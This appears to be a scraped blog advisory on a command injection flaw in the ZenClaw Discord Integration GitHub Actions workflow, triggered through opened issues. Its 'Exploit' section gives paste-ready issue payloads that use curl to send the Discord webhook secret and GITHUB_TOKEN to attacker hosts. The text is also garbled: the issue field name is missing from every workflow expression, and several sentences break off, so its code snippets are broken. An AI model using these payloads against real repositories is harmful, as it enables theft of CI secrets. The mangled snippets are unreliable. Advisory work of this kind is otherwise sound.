Listen to this Post
How GHSA-f67f-hcr6-94mf Works
The ZenClaw Discord Integration GitHub Actions workflow is vulnerable to shell command injection via the issue field. The workflow is triggered when an issue is opened, requiring no repository privileges.
In the `Prepare Notification` step, the issue is assigned to a shell variable using direct GitHub Actions template interpolation inside a `case` block:
issues) ... DESCRIPTION="${{ github.event.issue. }}" ;;
The GitHub Actions template engine resolves `${{ github.event.issue. }}` at workflow compilation time, embedding the raw issue as literal text in the bash script before execution. The value is assigned inside a double-quoted string, which in bash evaluates subshell expressions of the form `$(…)` and backtick expressions `...` at runtime.
Although a subsequent sanitization step is applied:
DESCRIPTION=$(echo "$DESCRIPTION" | tr '\n' ' ' | cut -c1-1000)
This sanitization runs after the assignment — the subshell in the has already executed by the time `tr` and `cut` process the output. The sanitization is therefore ineffective as a security control against command injection.
The resulting `DESCRIPTION` value is then written to $GITHUB_OUTPUT:
echo "description=$DESCRIPTION" >> $GITHUB_OUTPUT
This additional write is performed without a multiline-safe delimiter, enabling a secondary `$GITHUB_OUTPUT` injection if the contains a newline, which could overwrite downstream output variables such as `color` or .
An attacker can craft an issue containing a subshell expression that executes arbitrary commands on the runner during variable assignment, enabling exfiltration of the `DISCORD_WEBHOOK_URL` secret. The injected command runs with access to all secrets available to the runner.
<h2 style="color: blue;">DailyCVE Form:</h2>
Platform: GitHub Actions
Version: < 1.1.4
Vulnerability: Command Injection
Severity: Critical
date: 2026-03-21
<h2 style="color: blue;">Prediction: 2026-03-25</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
The vulnerability stems from improper neutralization of special elements used in a command (CWE-77). The GitHub Actions template engine expands expressions before the shell executes the script, creating a dangerous injection point. Any GitHub user can trigger this vulnerability without any repository role.
<h2 style="color: blue;">Analytics:</h2>
Detection command to check for vulnerable workflow patterns
grep -r '\${{ github\.event\.issue\. }}' .github/workflows/.yml
Check for unsafe interpolation in run blocks
grep -r 'run:.\${{' .github/workflows/.yml
Verify if DISCORD_WEBHOOK_URL is exposed in workflow
grep -r 'DISCORD_WEBHOOK' .github/workflows/.yml
<h2 style="color: blue;">Exploit:</h2>
Crafted issue to exfiltrate Discord webhook bug$(curl -s "https://attacker.example.com/exfil?wh=$(printenv DISCORD_WEBHOOK_URL | base64 -w0)")
Alternative payload to exfiltrate GITHUB_TOKEN $(curl -s "https://attacker.com/steal?token=$GITHUB_TOKEN")
Simple PoC to verify command execution $(whoami)
<h2 style="color: blue;">Protection:</h2>
✅ Secure: Pass through environment variable
env:
ISSUE_ ${{ github.event.issue. }}
run: |
issue_="$ISSUE_"
✅ Secure: Use multiline-safe delimiter for GITHUB_OUTPUT echo "description<<EOF" >> $GITHUB_OUTPUT echo "$ISSUE_" >> $GITHUB_OUTPUT echo "EOF" >> $GITHUB_OUTPUT
❌ Vulnerable: Direct interpolation in shell
run: |
ISSUE_="${{ github.event.issue. }}"
❌ Vulnerable: Unquoted variable expansion
run: |
issue_=${{ github.event.issue. }}
❌ Vulnerable: Using eval with user input
run: |
eval "ISSUE_=\"${{ github.event.issue. }}\""
<h2 style="color: blue;">Impact:</h2>
- Confidentiality (High): Exfiltration of `DISCORD_WEBHOOK_URL`, granting attackers the ability to send arbitrary messages to the Discord channel impersonating the legitimate bot
- Integrity (High): Attackers can manipulate Discord notifications, spoof trusted GitHub bot messages, or repeatedly trigger unwanted notifications
- Availability (None): The vulnerability does not directly impact availability
- Secondary Injection: `$GITHUB_OUTPUT` injection via newline characters can overwrite downstream output variables such as `color` or
– Attack Vector: Network, requires no privileges, no user interaction
– CVSS Score: 10.0 (Critical)
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
